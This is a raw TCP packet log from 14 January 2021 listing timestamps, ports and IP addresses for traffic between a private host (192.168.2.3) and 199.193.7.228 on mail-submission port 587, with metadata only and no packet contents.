Jan 14, 2021 08:02:21.025583982 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.025773048 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.025816917 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.025859118 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.025952101 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.129519939 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.131683111 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.215189934 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.215262890 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.215279102 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.215323925 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.215405941 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.215447903 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.215462923 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.215514898 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.215555906 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.215980053 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.216196060 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.216254950 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.216309071 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.216321945 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.216382027 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.216540098 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.322036028 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.322160959 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.405637026 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.405675888 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.405689955 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.405704021 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.405718088 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.405755043 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.405901909 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.405972004 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.406044006 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.406389952 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.406433105 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.406534910 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.406618118 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.406652927 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.406757116 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.406771898 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.406795025 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.406835079 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.406867027 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.406903028 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.407011986 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.512492895 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.512573004 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.596247911 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.596302986 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.596317053 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.596457958 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.598484993 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598520041 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598534107 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598548889 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598567009 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598578930 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.598582983 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598598003 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598612070 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.598614931 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598629951 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598644972 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598649025 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.598660946 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.598695040 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.598901033 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.598988056 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.702884912 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.706079006 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.786708117 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.786735058 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.786748886 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.786791086 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.786834955 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.786895990 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.788788080 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.788837910 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.788901091 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.788938046 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.788942099 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.789005995 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.789011002 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.789068937 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.789160013 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.789191961 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.789226055 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.789261103 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.789273977 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.789323092 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.789433002 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.789500952 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.789568901 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.789633036 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.896399021 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.897504091 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.977508068 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.977545023 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.977561951 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.977787971 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.979073048 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.979110003 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.979168892 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.979257107 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.979305029 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.979341984 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.979525089 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.979542017 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.979825020 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:21.979943037 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:21.980103970 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.087902069 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.092030048 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.168035030 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.168073893 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.168090105 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.168132067 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.168134928 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.168153048 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.168181896 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.168371916 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.169485092 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.169547081 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.169565916 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.169650078 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.169671059 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.169841051 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.169859886 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.169946909 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.169995070 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.170046091 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.170046091 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.170089960 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.170115948 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.170135021 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.170181990 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.170358896 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.170500040 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.170517921 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.170532942 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.170597076 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.170638084 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.282306910 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.282411098 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.358344078 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.358417988 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.358494997 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.358572960 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.358664036 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.358709097 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.359719992 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.359736919 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.359838963 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.359901905 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.359999895 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.360065937 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.360140085 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.360265017 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.360327959 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.360460997 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.360529900 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.360588074 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.360656023 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.360985041 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.361089945 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.361258984 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.361737967 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.472681999 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.472840071 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.548911095 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.548932076 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.548940897 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.548953056 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.549099922 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.549974918 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.550086975 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.550138950 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.550199986 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.550287962 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.550354004 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.550362110 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.550399065 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.550422907 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.550450087 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.550765038 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.550779104 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.550870895 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.550916910 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.550944090 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.551199913 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.551801920 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.551814079 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.551914930 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.663062096 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.739384890 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.739420891 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.739434958 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.740237951 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.740257978 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.740360022 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.740421057 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.740948915 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.740983963 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.741303921 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.768949032 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.771090984 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.961358070 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.961853981 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.961889029 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:22.961951971 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.962328911 CET	49831	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:22.962583065 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.152391911 CET	587	49831	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.152889013 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.156003952 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.349724054 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.352009058 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.407387972 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.407660961 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.541888952 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.542123079 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.543831110 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.597596884 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.597893000 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.597908020 CET	587	49832	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.598028898 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.598105907 CET	49832	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.733742952 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.736071110 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.791246891 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.791553974 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.926129103 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.926336050 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.926404953 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.927772999 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.927804947 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.927809954 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:23.981508017 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.981687069 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:23.981918097 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.117809057 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.117837906 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.119174957 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.119528055 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.171911001 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.172523975 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.309510946 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.311239958 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.311616898 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.362514019 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.362574100 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.362592936 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.362692118 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.363423109 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.363960028 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.501645088 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.505086899 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.505434990 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.553329945 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.553361893 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.553786993 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.554558039 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.554847956 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.695487022 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.698378086 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.698748112 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.744826078 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.746068001 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.746398926 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.888768911 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.930723906 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.930953026 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:24.936472893 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.939254999 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:24.939471960 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.121073961 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.122019053 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.122627020 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.122740030 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.122829914 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.123065948 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.123083115 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.123086929 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.123413086 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.123425007 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.129456997 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.130048990 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.130333900 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.312613964 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.312726974 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.312880993 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.312953949 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.313169003 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.320236921 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.329766989 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.331001043 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.348710060 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.349069118 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.520931959 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.523535013 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.523570061 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.524070978 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.524768114 CET	49833	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.524981022 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.538974047 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.540855885 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.544493914 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.544533014 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.544564009 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.544596910 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.544656038 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.544687033 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.544759035 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.714751959 CET	587	49833	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.715642929 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.715775967 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.734478951 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.734509945 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.734524965 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.734538078 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.734591007 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.734642982 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.734651089 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.734757900 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.909921885 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.910132885 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:25.924830914 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.924864054 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.924870968 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:25.925050974 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.100356102 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.100660086 CET	587	49835	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.100920916 CET	49835	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.115153074 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.115175009 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.115183115 CET	587	49834	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:26.115294933 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.115341902 CET	49834	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:26.115367889 CET	49834	587	192.168.2.3	199.193.7.228
